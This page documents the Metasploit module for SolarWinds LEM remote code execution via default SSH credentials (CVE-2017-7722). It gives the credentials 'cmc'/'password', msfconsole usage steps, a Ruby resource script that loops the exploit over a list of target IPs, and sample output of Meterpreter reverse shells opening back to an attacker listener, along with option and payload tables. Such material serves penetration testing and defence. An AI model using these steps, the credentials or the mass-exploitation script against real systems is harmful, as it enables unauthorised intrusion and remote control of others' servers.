SolarWinds LEM Default SSH Password Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/ssh/solarwinds_lem_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: SolarWinds LEM Default SSH Password Remote Code Execution
Module: exploit/linux/ssh/solarwinds_lem_exec
Source code: modules/exploits/linux/ssh/solarwinds_lem_exec.rb
Disclosure date: 2017-03-17
Last modification time: 2022-04-18 09:36:52 +0000
Supported architecture(s): python
Supported platform(s): Python
Target service / protocol: -
Target network port(s): 32022
List of CVEs: CVE-2017-7722

This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell. This module was tested against SolarWinds LEM v6.3.1.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using solarwinds_lem_exec against a single host

Normally, you can use exploit/linux/ssh/solarwinds_lem_exec this way:

msf > use exploit/linux/ssh/solarwinds_lem_exec
msf exploit(solarwinds_lem_exec) > show targets
    ... a list of targets ...
msf exploit(solarwinds_lem_exec) > set TARGET target-id
msf exploit(solarwinds_lem_exec) > show options
    ... show and set options ...
msf exploit(solarwinds_lem_exec) > exploit

Using solarwinds_lem_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your solarwinds_lem_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/ssh/solarwinds_lem_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.

Vulnerable application can be download as a free trial from vendor webpage. http://www.solarwinds.com/log-event-manager

Verification Steps


  1. Start msfconsole
  2. Do: use exploit/linux/ssh/solarwinds_lem_exec
  3. Do: set rhost <ip>
  4. Do: set lhost <ip>
  5. Do: exploit
  6. You should get a shell.

Scenarios


This is a run against a known vulnerable Solarwinds LEM server.
msf exploit(solarwind_lem_exec) > exploit

[] Started reverse TCP handler on 12.0.0.1:4444 [] 12.0.0.154:32022 - Attempt to login... [+] SSH connection is established. [] Requesting pty... We need it in order to interact with menuing system. [+] Pty successfully obtained. [] Requesting a shell. [+] Remote shell successfully obtained. [+] Step 1 is done. Managed to access terminal menu. [+] Step 2 is done. Managed to select 'service' sub menu. [+] Step 2 is done. Managed to select 'service' sub menu. [+] Step 3 is done. Managed to start 'restrictssh' function. [+] Step 4 is done. We are going to try escape from jail shell. [+] Sweet..! Escaped from jail. [] Delivering payload... [] Sending stage (38651 bytes) to 12.0.0.154 [] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300 [-] Exploit failed: Errno::EBADF Bad file descriptor [] Exploit completed, but no session was created.

msf exploit(solarwind_lem_exec) > sessions -i 1 [*] Starting interaction with 1...

meterpreter > getuid Server username: cmc meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the linux/ssh/solarwinds_lem_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/ssh/solarwinds_lem_exec

[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/ssh/solarwinds_lem_exec) > show info

       Name: SolarWinds LEM Default SSH Password Remote Code Execution
     Module: exploit/linux/ssh/solarwinds_lem_exec
   Platform: Python
       Arch: python
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-03-17

Provided by:
  Mehmet Ince <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  password         yes       The password for authentication
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     32022            yes       The target port
  USERNAME  cmc              yes       The username for authentication

Payload information:

Description:
  This module exploits the default credentials of SolarWinds LEM. A 
  menu system is encountered when the SSH service is accessed with the 
  default username and password which is "cmc" and "password". By 
  exploiting a vulnerability that exist on the menuing script, an 
  attacker can escape from restricted shell. This module was tested 
  against SolarWinds LEM v6.3.1.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-7722
  http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/

Module Options


This is a complete list of options available in the linux/ssh/solarwinds_lem_exec exploit:

msf6 exploit(linux/ssh/solarwinds_lem_exec) > show options

Module options (exploit/linux/ssh/solarwinds_lem_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         yes       The password for authentication
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     32022            yes       The target port
   USERNAME  cmc              yes       The username for authentication

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/ssh/solarwinds_lem_exec exploit:

msf6 exploit(linux/ssh/solarwinds_lem_exec) > show advanced

Module advanced options (exploit/linux/ssh/solarwinds_lem_exec):

   Name                    Current Setting                          Required  Description
   ----                    ---------------                          --------  -----------
   ContextInformationFile                                           no        The information file that contains context information
   DisablePayloadHandler   false                                    no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                    no        Use transient context when encoding payloads
   SSH_DEBUG               false                                    no        Enable SSH debugging output (Extreme verbosity!)
   SSH_IDENT               SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3  yes       SSH client identification string
   SSH_TIMEOUT             30                                       no        Specify the maximum time to negotiate a SSH session
   VERBOSE                 false                                    no        Enable detailed status messages
   WORKSPACE                                                        no        Specify the workspace for this module
   WfsDelay                2                                        no        Additional delay in seconds to wait for a session

Payload advanced options (python/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   HttpCookie                                    no        An optional value to use for the Cookie HTTP header
   HttpHostHeader                                no        An optional value to use for the Host HTTP header
   HttpReferer                                   no        An optional value to use for the Referer HTTP header
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PythonMeterpreterDebug       false            no        Enable debugging for the Python meterpreter
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/ssh/solarwinds_lem_exec module can exploit:

msf6 exploit(linux/ssh/solarwinds_lem_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/ssh/solarwinds_lem_exec exploit:

msf6 exploit(linux/ssh/solarwinds_lem_exec) > show payloads

Compatible Payloads
===================

   #   Name                                         Disclosure Date  Rank    Check  Description
   -   ----                                         ---------------  ----    -----  -----------
   0   payload/generic/custom                                        normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                             normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                        normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/python/meterpreter/bind_tcp                           normal  No     Python Meterpreter, Python Bind TCP Stager
   6   payload/python/meterpreter/bind_tcp_uuid                      normal  No     Python Meterpreter, Python Bind TCP Stager with UUID Support
   7   payload/python/meterpreter/reverse_http                       normal  No     Python Meterpreter, Python Reverse HTTP Stager
   8   payload/python/meterpreter/reverse_https                      normal  No     Python Meterpreter, Python Reverse HTTPS Stager
   9   payload/python/meterpreter/reverse_tcp                        normal  No     Python Meterpreter, Python Reverse TCP Stager
   10  payload/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Meterpreter, Python Reverse TCP SSL Stager
   11  payload/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Meterpreter, Python Reverse TCP Stager with UUID Support
   12  payload/python/meterpreter_bind_tcp                           normal  No     Python Meterpreter Shell, Bind TCP Inline
   13  payload/python/meterpreter_reverse_http                       normal  No     Python Meterpreter Shell, Reverse HTTP Inline
   14  payload/python/meterpreter_reverse_https                      normal  No     Python Meterpreter Shell, Reverse HTTPS Inline
   15  payload/python/meterpreter_reverse_tcp                        normal  No     Python Meterpreter Shell, Reverse TCP Inline
   16  payload/python/pingback_bind_tcp                              normal  No     Python Pingback, Bind TCP (via python)
   17  payload/python/pingback_reverse_tcp                           normal  No     Python Pingback, Reverse TCP (via python)
   18  payload/python/shell_bind_tcp                                 normal  No     Command Shell, Bind TCP (via python)
   19  payload/python/shell_reverse_tcp                              normal  No     Command Shell, Reverse TCP (via python)
   20  payload/python/shell_reverse_tcp_ssl                          normal  No     Command Shell, Reverse TCP SSL (via python)
   21  payload/python/shell_reverse_udp                              normal  No     Command Shell, Reverse UDP (via python)

Evasion Options


Here is the full list of possible evasion options supported by the linux/ssh/solarwinds_lem_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/ssh/solarwinds_lem_exec) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<RPORT> SSH - Disconnected during negotiation


Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH - Disconnected during negotiation" error message:

95:	        ssh = Net::SSH.start(rhost, username, opts)
96:	      end
97:	    rescue Rex::ConnectionError
98:	      return
99:	    rescue Net::SSH::Disconnect, ::EOFError
100:	      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
101:	      return
102:	    rescue ::Timeout::Error
103:	      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
104:	      return
105:	    rescue Net::SSH::AuthenticationFailed

<RHOST>:<RPORT> SSH - Timed out during negotiation


Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH - Timed out during negotiation" error message:

98:	      return
99:	    rescue Net::SSH::Disconnect, ::EOFError
100:	      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
101:	      return
102:	    rescue ::Timeout::Error
103:	      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
104:	      return
105:	    rescue Net::SSH::AuthenticationFailed
106:	      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
107:	    rescue Net::SSH::Exception => e
108:	      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"

<RHOST>:<RPORT> SSH - Failed authentication due wrong credentials.


Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH - Failed authentication due wrong credentials." error message:

101:	      return
102:	    rescue ::Timeout::Error
103:	      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
104:	      return
105:	    rescue Net::SSH::AuthenticationFailed
106:	      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
107:	    rescue Net::SSH::Exception => e
108:	      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
109:	      return
110:	    end
111:	

<RHOST>:<RPORT> SSH Error: <E.CLASS> : <E.MESSAGE>


Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH Error: <E.CLASS> : <E.MESSAGE>" error message:

103:	      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
104:	      return
105:	    rescue Net::SSH::AuthenticationFailed
106:	      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
107:	    rescue Net::SSH::Exception => e
108:	      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
109:	      return
110:	    end
111:	
112:	    if ssh
113:	      payload_executed = false

Could not request pty!


Here is a relevant code snippet related to the "Could not request pty!" error message:

115:	
116:	      ssh.open_channel do |channel|
117:	        print_status("Requesting pty... We need it in order to interact with menuing system.")
118:	
119:	        channel.request_pty do |ch, success|
120:	          raise ::RuntimeError, "Could not request pty!" unless success
121:	          print_good("Pty successfully obtained.")
122:	
123:	          print_status("Requesting a shell.")
124:	          ch.send_channel_request("shell") do |ch, success|
125:	            raise ::RuntimeError, "Could not open shell!" unless success

Could not open shell!


Here is a relevant code snippet related to the "Could not open shell!" error message:

120:	          raise ::RuntimeError, "Could not request pty!" unless success
121:	          print_good("Pty successfully obtained.")
122:	
123:	          print_status("Requesting a shell.")
124:	          ch.send_channel_request("shell") do |ch, success|
125:	            raise ::RuntimeError, "Could not open shell!" unless success
126:	            print_good("Remote shell successfully obtained.")
127:	          end
128:	        end
129:	
130:	        channel.on_data do |ch, data|

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.